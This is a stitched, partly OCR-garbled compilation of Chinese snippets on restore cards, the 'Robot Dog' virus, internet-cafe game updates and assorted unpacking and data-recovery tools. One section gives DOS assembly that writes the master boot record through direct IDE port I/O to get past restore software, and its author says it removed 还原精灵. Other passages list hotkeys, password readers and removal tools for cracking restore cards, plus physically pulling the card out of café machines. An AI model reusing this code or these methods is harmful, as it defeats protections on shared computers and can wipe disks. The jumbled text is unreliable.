一种可以穿透还原卡和还原软件的代码
电脑病毒分析二
AV终结者到底为何物?
• AV终结者”是一种U盘寄生病毒,其传播是通过U盘等存储介质或 者注入服务器来实现的。此类病毒都会在移动设备或硬盘根目录 下生成Autorun.inf文件,用户双击盘符即可激活病毒。除了U盘 之外,MP3、MP4、移动硬盘、数码相机等移动储存设备无一例外 地成为此类病毒的传播载体。2003年国内出现首例通过U盘传播的 病毒,进入2007年,“熊猫烧香”等重大病毒纷纷把U盘作为主要 传播途径,越来越多的电脑用户因为不当使用U盘而感染病毒,国 家计算机病毒应急中心在2月份为此专门发出“当心U盘传播病毒”吧被"咬伤"
• 26日,小李像往常一样到学校附近的网吧上网,谁知道多家网吧都打出 了停业的通知,原来一种“机器狗”病毒,目前正在烟台市区的网吧快 速蔓延传播。 • 烟台职业学院梦想网吧店主杜先生告诉记者:“这两天各种网络游 戏大面积被盗号,本以为是普通木马病毒,谁知道是中了“机器狗”病 毒,害得网吧停业两天,400多台机器系统全部重做。周围的各家网吧无 一幸免。” • 据介绍,“机器狗”病毒,是一种可穿透硬盘“还原卡”保护功能 的病毒,本没有名字,因为图标是SONY的机器狗阿宝,大家都叫它“机 器狗”。“机器狗”本身会让机器自动访问指定的网址,自动下载大量 的病毒与恶意插件,这种病毒会通过网吧的内部网络传播,如有一台中 毒,能令整条网络上的电脑全部自动重启,破坏力超过“熊猫烧香”。 • 据烟台科技市场网络专家李先生介绍,目前针对该病毒还没有很好 的解决方案,最好的方法就是断网重做系统。在此提醒广大上网人士和 网吧业主,要及时升级杀毒软件和系统补丁。
电脑兴趣小组研讨专题二:
常见流行计算机病毒剖析
主讲老师: 黄荣悦
维金恶性蠕虫病毒:
• • 病毒名称: Worm.Viking.m中文名称:维金(又名:威金) 受影响系统:Win 9x/ME,Win 2000/NT,Win XP,Win 2003
迅闪做游戏更新穿透还原教程
游戏更新环境设置:
服务器环境:
游戏服务器IP地址:192.168.1.198
游戏安装目录:D盘netgame
游戏安装目录共享名称:wlyx$(访问路径为\\192.168.1.198\wlyx$,共享权限为只读)
经过一系列直观简便的设置后,网吧整体的穿透还原更新系统基本完成了,现在唯一要做的就是把每台电脑上都装好客户端,然后再将游戏逐一拷贝过去,一般在新装时都用网刻,但如果是临时改成这种穿透还原的话,首先要注意的就是病毒,客户端最好先还原一下原有的镜像再做。穿透还原是一项比较成熟的技术,但目前这方面的病毒发展也很迅速,各位网管朋友经常注意下网上的病毒通报,发现有大面积流行的病毒提早预防才能保证安全
2、执行配置工具目录中的“配置工具.exe”,第一次使用会出现选择“游戏菜单”所在目录的窗口。依次选择D:\gamemenu\游戏菜单,点击OK确定。之后弹出管理员登陆的窗口,初使密码为空,点击登陆后进入软件注册界面,按照提示输入正常的信息即可完成注册,这里需要我们注意的是,注册界面最下面一行“菜单标题”输入的是我们游戏菜单标题栏显示的内容,注册后不可修改,除非重新注册,需慎重填写。完成注册后即可进入服务端配置界面。
前台穿透更新:就是连续两次更新,第一次向虚拟磁盘更新,第二次真实磁盘中更新,更新完成后就直接运行游戏。
后台穿透更新:在向当前虚拟磁盘更新完成后,会有一个进程进行限速的游戏更新过程。更新中不会影响顾客玩游戏。(这里的限速可以在“后台更新限速”中设置,单位K/S)
闪断穿透更新:直接向真实磁盘中更新,更新完成后会断掉当前分区的连接,重新加载一次这个分区,把真实际上磁盘中的游戏刷新到当前虚拟磁盘中。但是闪断过程中会导致当前打开的这个分区的句柄关闭。
还原卡
3、软件统一注册
由于网络拷贝以后,所有计算机的硬盘数据都是一致的,这会导致在不同机器上需要使用不同序列号的软件不能正常使用,从而需要在每台单机上重新注册,这无疑将增加用户的工作量,并大大限制了网络拷贝或差异拷贝的使用。软件统一注册功能就是为了解决这个问题而设计的,它能够记住每台计算机的软件序列号,在拷贝完成后自动将对应的序列号更改正确,避免了重复注册的工作。
[2]蓝芯防毒墙实物照片
[3]这种新型还原卡跟普通还原卡,原理上已经有了很大的不同,首先不完全依靠BOOTROM来取得控制权了,而是总线硬件直接获得控制权,这样更可靠的获得对计算机数据资源的控制;另外,因为直接控制了硬盘的物理读写能力,这样可以实现硬盘硬件读写的驱动和还原算法合二为一,也就是没有普通还原卡的过滤驱动了。这样就彻底避免了普通还原卡还原不可靠的问题。
编辑本段提醒还原卡用户
测试破解还原精灵的代码
要提醒虚拟还原用户的是,不要以为装有还原卡或是还原软件就掉以轻心,要知道世界上还是有病毒能够穿透虚拟还原技术的保护,达到破坏硬盘的目的的,想象一下如果把这一原理运用到CIH病毒中,或者运用到硬盘杀手病毒中,其后果是不堪设想的。 谈谈如何用这种可以穿透虚拟还原技术的代码来破解还原软件(如还原精灵)吧。以下是我写的用来测试破解还原精灵的代码,本代码编译后的程序需要在纯DOS环境执行,在DOS下我用这段代码成功的把还原精灵给卸载了。 .286 CODE SEGMENT ASSUME CS:CODE,DS:code,ES:code START: ;---------------------------------------------------------- ;以下代码用INT13H读主引导区 mov ax,0201h mov dx,0080h mov cx,0001h mov bx,7c00h int 13h ;--------------------------------------------------------- ;以下代码用I/O端口来写主引导区 mov dx,1f6h ; 要读入的磁盘号及磁头号 mov al,0a0h ; 磁盘0,磁头0 out dx,al mov dx,1f2h ; 要写的扇区数量 mov al,1 ; 写一个扇区 out dx,al mov dx,1f3h ;要写的扇区号 mov al,1 ;写到1扇区 out dx,al mov dx,1f4h ; 要写的柱面的低8位 mov al,0 ; 低8位为0 out dx,al mov dx,1f5h ; 要写的柱面的高2位 mov al,0 ; 高2位为0 out dx,al mov dx,1f7h ;命令端口 mov al,30h ;尝试着写扇区. out dx,al oogle: in al,dx test al,8 ;磁盘扇区缓冲是否准备好 jz oogle mov cx,512/2 ;设置循环次数(512/2) mov si,7c00h mov dx,1f0h ;数据端口,用来存放要发送的数据. rep outsw ;发送数据. ; ------------------------------------------------------------------------------ ;退出程序 mov ah,4ch int 21 CODE ENDS END START
magicrescue命令用法
magicrescue命令用法安装magicrescue首先,您需要在系统上安装magicrescue。
在大多数Linux发行版中,可以使用包管理器来安装magicrescue。
例如,在Debian或Ubuntu上,您可以运行以下命令:```sudo apt-get install magicrescue```命令用法一旦安装了magicrescue,您可以使用以下命令来扫描并恢复数据:``````参数:-`-r<配置文件>`:指定配置文件。
配置文件中定义了要恢复的文件类型。
-`-c<配置文件>`:显示配置文件的内容。
-`-b<扇区>`:设置扫描的起始位置(以扇区为单位)。
-`-s<扇区>`:设置扫描的结束位置(以扇区为单位)。
-`-x<文件类型>`:添加类型为<文件类型>的文件到已知类型列表。
-`-l`:列出所有已知的文件类型。
-`-a`:复制所有已找到的文件,而不仅仅是已知类型的文件。
磁盘设备是要扫描的设备文件名,例如/dev/sda。
输出目录是恢复文件的保存位置。
示例用法以下是一些使用magicrescue的示例用法:1.扫描整个磁盘并恢复所有已知类型的文件:``````这将扫描/dev/sda设备,并将恢复的文件保存到output_directory 目录中。
2.扫描指定的分区:``````在这个例子中,我们设置了扫描的起始和结束扇区,以便只扫描指定的分区。
3.使用自定义配置文件:``````通过指定自定义配置文件custom.conf,您可以定义要恢复的文件类型。
4.查看配置文件:``````这将显示默认配置文件的内容。
5.添加自定义文件类型:``````使用`-x`参数,您可以将自定义文件类型添加到已知类型列表中。
6.列出所有已知的文件类型:``````这将列出所有已知的文件类型。
7.仅恢复已知类型的文件:``````使用`-a`参数,您可以复制所有已找到的文件,而不仅仅是已知类型的文件。
dnguardunpackerfr4用法
1. 介绍DNGuard Unpacker FR4的作用和特点DNGuard Unpacker FR4是一款专业的反混淆工具,主要用于反混淆和解密使用DNGuard加密的程序。
它能够快速高效地分析和解密DNGuard加密的程序,帮助用户轻松地获得原始的未加密程序代码。
DNGuard Unpacker FR4的主要特点包括:- 高效快速:能够快速地解密和分析DNGuard加密的程序,大大节省用户的时间。
- 简单易用:操作简单,界面友好,即使是没有专业技术背景的用户也能够轻松上手。
- 兼容性强:支持多种版本的DNGuard加密程序,能够适应不同的加密情况。
- 安全可靠:解密过程安全可靠,不会对原始程序代码造成任何损害。
2. DNGuard Unpacker FR4的使用方式用户可以通过以下步骤来使用DNGuard Unpacker FR4进行反混淆和解密:- 下载并安装DNGuard Unpacker FR4软件;- 打开软件,选择要解密的DNGuard加密程序;- 运行解密程序,等待解密过程完成;- 导出解密后的原始程序代码。
3. DNGuard Unpacker FR4的应用场景DNGuard Unpacker FR4广泛应用于软件安全领域,主要适用于以下场景:- 逆向工程:帮助安全研究人员对DNGuard加密的程序进行逆向工程分析,了解程序的内部逻辑和算法;- 安全评估:帮助安全从业人员对加密的程序进行安全评估,发现其中可能存在的漏洞和风险;- 反病毒分析:帮助反病毒从业人员对DNGuard加密的程序进行分析,识别其中的恶意代码和行为。
4. DNGuard Unpacker FR4的未来发展随着软件安全领域的不断发展和变化,DNGuard Unpacker FR4也在不断进行更新和优化,以适应新的加密技术和需求。
未来,DNGuard Unpacker FR4将继续致力于提供更快、更高效、更安全、更稳定的反混淆和解密服务,为用户提供更好的使用体验和技术支持。
h-efs recover 使用经验
1. 介绍h-efs recover概念h-efs recover是一种用于数据恢复的专业软件,它可以帮助用户从硬盘、闪存、固态硬盘等存储介质中恢复被意外删除、格式化、损坏、病毒感染等原因导致的数据丢失情况。
2. h-efs recover的特点和优势a. 支持多种存储介质:h-efs recover可以对硬盘、U盘、SD卡、固态硬盘等多种存储介质进行数据恢复。
b. 多种数据丢失情况:无论是意外删除、格式化、病毒感染还是硬件损坏,h-efs recover都能够应对。
c. 灵活的恢复方式:用户可以选择快速扫描或者深度扫描来恢复数据,还可以针对具体文件类型进行恢复。
d. 用户友好的操作界面:h-efs recover的操作界面简洁直观,即使是没有专业技术背景的用户也可以轻松上手。
3. 如何使用h-efs recovera. 下载安装:用户需要先从冠方全球信息站下载h-efs recover的安装程序,然后按照提示进行安装。
b. 打开软件:安装完成后,双击桌面图标或者在开始菜单中找到h-efs recover并运行。
c. 选择存储介质:在软件界面中,用户需要选择出现数据丢失情况的存储介质,比如硬盘或者U盘等。
d. 选择恢复方式:根据具体情况,用户可以选择快速扫描或者深度扫描,并可以设定文件类型过滤。
e. 开始恢复:点击“开始恢复”按钮后,h-efs recover会开始扫描选定的存储介质,并列出可恢复的文件列表。
f. 保存恢复数据:用户可以预览扫描结果,选择需要恢复的文件,并设定保存位置,最后点击“恢复”按钮完成操作。
4. 如何最大化h-efs recover的效果a. 尽早操作:一旦发现数据丢失情况,用户应当立即停止使用相关存储介质,以免覆盖已经被删除的数据。
b. 确保存储介质畅通:h-efs recover在恢复数据时需要对存储介质进行读取,因此如果存储介质出现物理损坏,恢复效果可能会受到影响。
机器狗病毒的预防与清除
木 马程 序来截取 用户的帐 号信 息。
可通过 以下几方面查看 是否 已中毒 。
永久防御方法!
软 还 原 ( 点 类 ,网 维 大 师 冰 类 ) 硬 还原 ( , 还原卡类 ) 为 网吧 , 行 业 做 了很 大 的 贡献 , 是 病 毒 也
统 进行修改 , 题 就在这里 , 问 如 果不用管 理员登 录行不行 ?
组, 最高就是网吧一般登 录的管
理 员组 , d ns a r组 。  ̄a miirt s t o
害网吧行业 。 它们为我们保 护了 系统 , 那我们 拿什么保 护他们 呢? 其 实 保 护 硬 盘 控 制权 的事 ,
比尔 ・ 茨 早 就 给 大 家 做 了. 盖 现
在 网 吧 都 在 用 W i d WS 0 O n O 0 / 2
目录下。 不知 道 如何复 制?可 以用
U 从 正 常 的机 器 拷 过 来 , 者 盘 或 进行 这 些 操 作 之 前 , 这个 正常 把 文件从 网上下载 回来 。
3将复制过 来的u e ii x 。 s rntee 改名 。 随便 改 名 , 比如改 成my x .e e
( 得扩展 名 ) 然后 在注 册 表 , 记 ,
Wi d w 系 统 本 身 就 有 好 多 nos
级 别 的用 户 ( 图 2 , 个 级 别 如 )各
的用 户有着 各 个 级 别 的权 限 , 最
低的 是get 的用户, 一些 的 us组 s 高
是 ues sr组的 , 再高 就是p w r sr o e es u
作 者 们 最 头 痛 的 事 , 们 一定 会 他 利用 这 种原 理 大 量 生 产 病 毒 , 危
现 在 新 建 一 个 用 户 , 它 放 把 最 第二高级  ̄pw r sr组 , o e es 去运 u 行病 毒 , 结果 不能进 行, 么只要 那 把 网吧 自动登 录 的用 户, 即上 网的
vmp脱壳还原代码
vmp脱壳还原代码
VMProtect 是一款反调试、加壳保护软件,具有高度的安全性。
可以将程序进行加密,增加程序的难度,从而使得攻击者在破解时更难达到目的。
VMProtect脱壳还原代码就是通过脱去VMProtect壳来恢复原始的程序代码。
一般情况下,脱壳的流程如下:
1. 首先,使用反编译工具,将程序反编译成可读的
C/C++语言代码;
2. 然后,研究反编译出来的代码,找到VMProtect壳的特征和加壳方式;
3. 最后,根据VMProtect壳的特征和加壳方式,编写脱壳程序,将VMProtect壳去掉,还原原始的程序代码;
4. 最后,将还原后的程序代码重新编译,生成程序可执行文件。
破解还原卡
首先说下,你要想破解还原卡,首先要知道使用的是什么还原卡,这里说下怎样查找你计算机上所使用的还原卡类型
具体方法:
1:一般是凭借经验或者查看启动项
最有效的方法是计算机在启动的过程中,利用热键把还原软件呼出来
例如,还原精灵:ctrl+home 或者home
小扫兵还原卡:ctrl+home或者ctrl+F10 CTRL+F2
冰点:ctrl+alt+shift+F6
这些都要在计算机在刚开始启动时候开始按,然后就可以呼出,一呼出你就可以看到还原卡了,有密码的话,就很进行相关设置了
2:当然,你还可以在计算机上查找相应的驱动,比如你在计算机上发现了,小扫兵的驱动程序
3:还原精灵破解工具,内有还原精灵密码读取工具,以前我在2000下和98下很多情况都可以读取密码
在XP下也有成功的经历 ,压缩包内还有“还原精灵逆风移除程序”,对付还原精灵最有效了
过了,能破解很多还原卡,包括硬件还原,和软件还
原,也可以破解小扫兵,金盾,蓝沙等等
那99%的可能你计算机上装的就是小扫兵了
我想说下,谁个还有更好的破解各类还原卡的工具,希望都集中在这里发.发的工具,你一定要有成功使用的经历,不要发没有作用的工具,同时我会根据工具的质量给于宝石奖励。。
1:这个对于破解冰点很有用的
2:华苏还原卡卸载工具,一看就知道破解华苏还原卡小扫兵的
20190504桌面云解决方案-教育
一、方案概况✧ 1.电子教室现状一直以来,我国学校课堂教学的改革持续不断,在实践和理论两方面取得了重大突破和巨大成就。
但是,传统的粉笔加黑板的单一教学模式基本没有改变,减轻学生和教师负担、大幅度提高教学质量等问题依然没有得到根本解决,这种教学方式已不能满足当今计算机技术教学的要求。
因此,利用计算机这种现代化手段,创建多媒体电子教室,形成现代化教学环境,完成计算机教学和计算机辅助教学,逐步建立适应信息社会需要的教学模式,从而大大推进教学现代化进程,已得到社会和教育界等有识之士的普遍认同。
目前多媒体电子教室作为一种新兴的教学环境已经逐步在各地大中小学里普及,充分发挥多媒体教学的优势,对于培养学生的创造思维,不断提高学校教学质量具有重要作用。
电子化教学的基础是电子机房网络及终端平台,虽然目前多媒体教学软件种类繁多,但其价值仅定位于解决教学应用。
随着电子教学的迅速、大规模发展,如何确保电子机房网络及终端的可用性和良好的可维护性,成为电子化教学面临的关键问题。
✧ 2.电子教室目前存在的问题电子教室网络作为电子化教学的载体,当前存在着以下急待解决的问题: 因操作不当频繁对系统及软件造成的损害学生们对计算机的了解程度不同,在接受新知识的同时总是希望更多的尝试和实际操作,于是在使用过程中常常会出现很多误操作的问题;例如,刚刚接触文件新建和删除的时候,可能会频繁的新建和删除文件,这样做的直接结果便是会出现大量的无用文件或者系统文件被删除而导致系统瘫痪。
频繁的重新安装大量的操作系统无疑是项庞大的工程,虽然目前很多学校采取还原卡或者还原软件来解决类似问题,但这种办法还远远不能降低机房管理人员的工作量以及维护成本。
采用还原卡投入很大,而且还原软件目前还存在一些BUG,比如,有的会出现桌面图标变花,有的会失去作用等。
系统安全维护及软件更新复杂校园网内电子教室众多,终端系统的安全管理变的异常困难,类如操作系统的补丁更新、防病毒软件的安装和升级等,虽然操作系统补丁或者防病毒软件都可以实现自动升级但在实际环境中往往很难实现,通常需要网络管理人员亲自动手安装和更新。
机器狗病毒
机器狗病毒网络12K1 121909030108 宫鑫茹1.机器狗病毒的原理2007年,一种可以穿透各种还原软件与硬件还原卡的机器狗病毒异常肆虐。
此病毒通过pcihdd.sys驱动文件抢占还原软件的硬盘控制权。
并修改用户初始化文件 userinit.exe 来实现隐藏自身的目的。
此病毒为一个典型的网络架构木马型病毒,病毒穿透还原软件后将自己保存在系统中,定期从指定的网站下载各种木马程序来截取用户的帐号信息。
机器狗的生前身后,曾经有很多人说有穿透还原卡、冰点的病毒,但是在各个论坛都没有样本证据,直到2007年8月29日终于有人在社区里贴出了一个样本。
这个病毒没有名字,图标是SONY的机器狗阿宝,就像前辈熊猫烧香一样,大家给它起了个名字叫机器狗。
机器狗原理:建立磁盘底层驱动。
1.校验IDT的NPXSegment Overrun(09)和Page Fault(OE)的矢量地址,如果存在,则把高16位设置为0,这个过程和还原软件的原理是一样的,就是对OE的HOOK检验。
2.给自己找个位置,查找驱动资源中的1000/1000,然后COPY到ALLOVER缓冲区中。
3.建立物理磁盘PhysicalHardDISK0的\Device----DosDevices的底层借口,针对“IRP_MJ_CREATE”“IRP_MJ_CLOSE”“IRP_MJ_DEVICE_CONTROL”响应。
“IRP_MJ_CREATE”断开\Device\Harddisk0\DR0-1上的附属部件。
从而使磁盘OS 层提供的应用层文件系统鉴听校验失效。
然后通过“I_M_C ”中恢复DR0-1上的附加。
并在I_M_D_C中对0x0004f8E——0xF0003C0F作出响应,把ALLOVER缓冲区中找到的数据解密并返回应用层。
通过KEY-s查表产生密钥。
0x0004f8E——0xF0003C0F字段会将用户态代码作为源基,对其运算后得到字串KEY,用来对源驱动解密后,反还给用户层。
网吧破解还原卡的方法总结
网吧破解还原卡的方法总结还原卡及还原精灵的破解学生:今天上机我发现了一个重大问题:在网吧的计算机上保存不住任何文件!发现这个情况也是偶然的:明明在计算机上安装了很多软件,突然间死机了,重启之后刚才安装的软件一个也找不到了,系统就象被网管重新安装了一遍那么干净。
我决心找出其中的原因,不然的话,我每次上机都要为自己安装一些习惯使用的软件如Netants(网络蚂蚁),这也太烦人了吧。
哈哈,还真叫我发现其中的奥妙,因为计算机操作系统容易受错误操作、非法关机、病毒入侵、恶意破坏等问题的影响,所以网管在每台计算机上安装了叫做硬盘还原卡(也叫做数据保护卡)的硬件设备,其界面为如图1-13-1 。
硬盘还原卡被制作成可以插入计算机扩展插槽的外置插卡形状如图1-13-2 ,下面的这一种是三合一的卡(网卡+保护卡+数据克隆)如图1-13-3 ,只要将此卡插入计算机,并指定其保护的磁盘区域,以后即使用户任意重新分区,格式化、修改配置、删除文件、感染病毒等等,只要重新启动计算机,一切就象什么也没有发生过,硬盘自动恢复成了系统的初始状态。
正因为还原卡有如此神奇功效,网吧、学校机房等场所都纷纷安装了此类还原卡,认为从此天下太平了。
其实可害“哭”了象我们这样的网吧上网族,比如正在运行着程序突然当机了,没办法,RESET重启吧,原先辛辛苦苦下载的数据一下子就没了。
损失惨重、教训惨痛啊!并且在还原卡的保护下,我们想修改计算机的配置信息都改不了。
那还提什么系统入侵呀,破解还原卡的工作是势在必行了。
不知道大家注意过没有,网吧的计算机因为经常坏需要维修,所以机箱盖板的螺丝基本是不上的,壳子就松松垮垮的套在机箱上。
因为还原卡是块插卡,又没有螺丝上着,赤手空拳的就可以对付它了。
我就瞅机会把还原卡拽下来了。
如图1-13-4 瞧这只黑手,在高速的拔卡过程中被看到了,哈哈!注意:千万不要在机器通电的时候这么干,要不然主板冒烟可不是闹着玩的。
哈哈,卡子移出了看你还能有什么本事!这样做有些品牌的还原卡会在引导的时候提示“移出还原卡”,回车确定以后还原卡功能就被彻底从系统中清除了。
机械狗病毒
机器狗病毒(2008年,木马)社会背景,经济损失:因为其他病毒在装有软硬件还原卡计算机中只要重新启动计算机那么系统中的文件就会还原,所以就算计算机中了病毒在没有重启的情况下是可以驻留在系统,但是只要重启计算机,计算机中安装的还原卡就会是整个系统恢复到初始状态,病毒就会被清除,所以病毒就不会常驻计算机系统内。
这就促使了一些机器狗的诞生,特别是针对网吧中计算机中的装有还原卡的机器,机器狗的制造者就想办法制造一种能够穿透还原卡、冰点的病毒。
机器狗病毒通过采用hook系统的磁盘设备栈来达到穿透的目的,从而常驻内存,即使计算机重启也无法达到清除!这样的想法就导致了机器狗的产生!也有可能是因为行业内的市场竞争导致,机器狗病毒因其发作时间之长、影响范围之大成为“毒”王。
“机器狗”累计造成了至少80亿元人民币的经济损失,危害远远超过著名的“熊猫烧香”。
杭州顺网信息技术有限公司宣布悬赏50万元捉拿该病毒元凶。
危害远远超过曾轰动一时的“熊猫烧香”。
现象:机器狗病毒是一种木马下载器,此病毒也是一个典型的网络架构木马型病毒,感染后会自动从网络上下载木马、病毒,危及用户帐号的安全,机器狗本身运行的时候也会产生一个名为PCIHDD.SYS 的驱动文件,采用了hook 系统的磁盘设备栈来达到穿透目的的与原系统中还原软件驱动进行硬盘控制权的争夺,并且通过替换userinit.exe 文件来实现开机就启动机器狗,可以说穿透目前技术下的任何一种软硬件的还原,危害性极大!原理:机器狗是一个木马下载器,感染后会自动从网络上下载木马、病毒,危及用户帐号的安全。
机器狗运行后会释放一个名为PCIHDD.SYS的驱动文件,与原系统中还原软件驱动进行硬盘控制权的争夺,并通过替换userinit.exe文件,实现开机启动。
传播途径:机器狗病毒的传播途径可以通过U盘、移动硬盘、网页的挂载、网站的钓鱼传播机制:机器狗”病毒的传播主要是利用系统或应用软件的漏洞进行的。
轻松破解还原卡
破解三茗还原卡还原卡及还原精灵的破解还原卡及还原精灵的破解学生:今天上机我发现了一个重大问题:在网吧的计算机上保存不住任何文件!发现这个情况也是偶然的:明明在计算机上安装了很多软件,突然间死机了,重启之后刚才安装的软件一个也找不到了,系统就象被网管重新安装了一遍那么干净。
我决心找出其中的原因,不然的话,我每次上机都要为自己安装一些习惯使用的软件如Netants(网络蚂蚁),这也太烦人了吧。
哈哈,还真叫我发现其中的奥妙,因为计算机操作系统容易受错误操作、非法关机、病毒入侵、恶意破坏等问题的影响,所以网管在每台计算机上安装了叫做硬盘还原卡(也叫做数据保护卡)的硬件设备,其界面为如图1-13-1 。
硬盘还原卡被制作成可以插入计算机扩展插槽的外置插卡形状如图1-13-2 ,下面的这一种是三合一的卡(网卡+保护卡+数据克隆)如图1-13-3 ,只要将此卡插入计算机,并指定其保护的磁盘区域,以后即使用户任意重新分区,格式化、修改配置、删除文件、感染病毒等等,只要重新启动计算机,一切就象什么也没有发生过,硬盘自动恢复成了系统的初始状态。
正因为还原卡有如此神奇功效,网吧、学校机房等场所都纷纷安装了此类还原卡,认为从此天下太平了。
其实可害“哭”了象我们这样的网吧上网族,比如正在运行着程序突然当机了,没办法,RESET重启吧,原先辛辛苦苦下载的数据一下子就没了。
损失惨重、教训惨痛啊!并且在还原卡的保护下,我们想修改计算机的配置信息都改不了。
那还提什么系统入侵呀,破解还原卡的工作是势在必行了。
不知道大家注意过没有,网吧的计算机因为经常坏需要维修,所以机箱盖板的螺丝基本是不上的,壳子就松松垮垮的套在机箱上。
因为还原卡是块插卡,又没有螺丝上着,赤手空拳的就可以对付它了。
我就瞅机会把还原卡拽下来了。
如图1-13-4 瞧这只黑手,在高速的拔卡过程中被看到了,哈哈!注意:千万不要在机器通电的时候这么干,要不然主板冒烟可不是闹着玩的。
还原卡工作原理
这里包括对8G以下的硬盘的普通通过磁头、磁道、扇区定位的INT13H中的写操作,和扩展INT13H中基于扇区地址方式的对大硬盘的写操作,甚至包括扩展INT13H中对一些非IDE接口的硬盘的写操作。
至于拦截后做什么是虚拟还原技术实现的关键,在早期的DOS系统当中完全可以“什么都不做”,也就是说当用户写硬盘时实际上是什么都没做,但现在的操作系统都要对硬盘进行一些必要的写操作,比如对虚拟内存的写操作。众所周知,虚拟内存实际上就是硬盘,而如果禁止操作系统写硬盘的话显然后果是不堪设想的。所以,大多数虚拟还原厂商用的方法是占用一些硬盘空间,把硬盘所进行的写操作做一个记录,等系统重新启动后还原这一记录,但是怎样科学记录硬盘的写操作,是我一直没想通的问题,这种“科学”应该体现在时间上和硬盘空间的占用量上的,也就是说怎么样用最少的时间和最少的硬盘空间来记录硬盘的写操作是实现关键,如果有这方面想法的朋友欢迎和我交流;
为了区别各个中断,CPC系统给每个中断都分配了一个中断号N,比如INT 3H是断点中断,INT 10H是显示中断,我们今天要讨论的主要是INT 13H磁盘读写中断。
要说清楚PC机上的中断机制,用这一点篇幅是完全不够的,这里我所说的只是一个大概,如果你不清楚的话,请查阅一些资料或和我交流,我们今天重要要说的就是以INT13H为例看看BIOS提供给我们的中断到底都是在做什么?所谓BIOS中断简单说就是你机器上的BIOS提供的中断,那么在BIOS中断的后面,到底是些什么呢?实际上是一些对端口的输入输出操作,PC的每个端口都实现特定的功能,我们完全可以不调用BIOS提供的中断而直接用输入输出指令对这些端口进行操作,从而可以实现象调用BIOS中断一样的功能,但是一个前提是你必须对这些端口有详细的了解。反过来说,PC的中断系统的一大好处就是能够让程序员无须了解系统底层的硬件知识的而能够编程,从这点看,中断有点象我们平时所说的“封装”,我不知道这样说对不对,但的确中断为我们“封装”了许多系统底层的细节。
ast原理与混淆还原
AST原理与混淆还原1. 引言在软件开发和信息安全领域,AST(抽象语法树)是一种常用的数据结构,用于表示源代码的结构和语义。
AST可以帮助程序员理解代码的结构,进行代码分析和优化,也可以用于实现代码混淆和还原。
代码混淆是一种保护源代码的技术,通过对代码进行变换和重构,使得代码难以阅读和理解,从而增加攻击者分析和逆向工程的难度。
而代码还原则是将经过混淆的代码恢复成原始的可读性较高的代码,便于理解和维护。
本文将详细介绍AST的基本原理,以及与代码混淆和还原相关的技术和方法。
2. AST基本原理2.1 什么是ASTAST(Abstract Syntax Tree,抽象语法树)是一种数据结构,用于表示源代码的结构和语义。
AST是一个树形结构,每个节点代表源代码中的一个语法结构,比如表达式、语句、函数等。
节点之间通过父子关系和兄弟关系连接起来,形成一棵树。
AST可以帮助我们理解代码的结构和语义,进行代码分析和优化。
AST可以通过解析源代码得到,也可以通过源代码的抽象语法定义手动构建。
2.2 AST的构建过程构建AST的过程通常包括以下几个步骤:1.词法分析:将源代码分割成一个个的词法单元,比如变量名、关键字、运算符等。
2.语法分析:根据词法单元构建语法树,即AST。
语法分析的过程中,会根据语法规则进行语法检查和错误提示。
3.语义分析:对AST进行语义分析,检查代码的合法性和语义错误。
语义分析的过程中,会进行类型检查、作用域分析等。
4.优化:对AST进行优化,改进代码的性能和可读性。
优化的方式包括常量折叠、死代码消除、循环展开等。
5.代码生成:根据AST生成目标代码,比如机器码、字节码等。
2.3 AST的应用AST在软件开发和信息安全领域有着广泛的应用。
在软件开发中,AST可以帮助我们理解代码的结构和语义,进行代码分析和优化。
比如,可以通过AST检测代码中的潜在问题,如空指针引用、死循环等;还可以通过AST进行代码重构,改进代码的可读性和性能。
recoverit 序列码
recoverit 序列码全文共四篇示例,供读者参考第一篇示例:恢复数据丢失可能会发生在我们的日常生活中。
我们可能会不小心删除文件,格式化硬盘,或者遭受病毒攻击导致数据丢失。
在这种情况下,就需要一个数据恢复工具来帮助我们找回丢失的文件。
而在数据恢复工具中,Wondershare Recoverit 无疑是一个非常强大的选择。
Wondershare Recoverit 是一款专业的数据恢复软件,它可以帮助用户快速找回删除、格式化、病毒攻击等多种情况下丢失的文件。
无论是从计算机、手机、U盘、硬盘还是SD卡中删除的文件,Recoverit 都可以进行快速、安全的恢复。
与其他数据恢复软件相比,Recoverit 有几个独特的功能:Recoverit 支持恢复各种类型的文件,包括照片、视频、音频、文档、邮件等。
不管是哪种类型的文件丢失,Recoverit 都能帮助用户找回。
Recoverit 具有高度的数据恢复成功率。
它采用先进的扫描算法,可以深度搜索存储设备,找回丢失的文件。
Recoverit 还提供了“快速恢复”和“深度恢复”两种模式,用户可以根据具体情况选择恢复模式。
Recoverit 还具有用户友好的界面和操作流程。
即使是没有专业数据恢复经验的用户,也能轻松使用Recoverit 找回文件。
只需几个简单的步骤,就可以完成数据恢复过程。
Recoverit 还提供了多种版本,包括免费版、专业版、企业版等,满足不同用户的需求。
用户可以根据自己的实际情况选择合适的版本,享受更多的功能和服务。
那么,如何获取Recoverit 的序列码呢?通常情况下,用户可以通过官方网站购买序列码。
购买后,用户将收到一封包含序列码的确认邮件。
用户可以在软件中输入序列码,激活软件,享受更多的功能和服务。
有些电商平台也提供Recoverit 的序列码销售服务,用户可以选择购买。
不过,我们也要注意,购买序列码时要选择正规渠道,避免购买盗版序列码。
机器狗
问题3:机器狗病毒对网吧的影响很大,对个人用户的影响有多少?
回答:个人用户的影响与网吧的影响是同样大的。因为不管计算机系统是否安装“还原保护系统”程序,都 会同样下载非常多的(是下载27个恶意程序)网络游戏盗号木马等恶意程序进行安装运行,从而给被感染计算机用 户带去一定的损失。如果“用户计算机硬件配置比较低”或者“存在所下载的多个恶意程序中出现相互不兼容现 象”的话,会导致用户计算机系统崩溃掉无法启动运行。
描述
机器狗该病毒大都在网吧等大型的电脑网络会比较流行,一般在个人电脑不容易中此病毒,现在大多杀毒软 件都可以查杀该病毒。
计算机病毒
机器狗的生前身后,曾经有很多人说有穿透还原卡、冰点的病毒,但是在各个论坛都没有样本证据,直到 2007年8月29日终于有人在社区里贴出了一个样本。这个病毒没有名字,图标是SONY的机器狗阿宝,就像前辈熊 猫烧香一样,大家给它起了个名字叫机器狗。
·超级巡警之机器狗病毒专杀v1.3:
本工具可检测并查杀机器狗病毒,可穿透机器狗所能穿透的还原系统来修复被感染的文件。本工具还具有免 疫的功能,针对已知机器狗变种进行免疫,防止再次感染。另外,可使用命令行方式进行杀毒,便于自动化操作, 建议网吧等场所设置为开机自动杀毒,减少重复作业。
变种
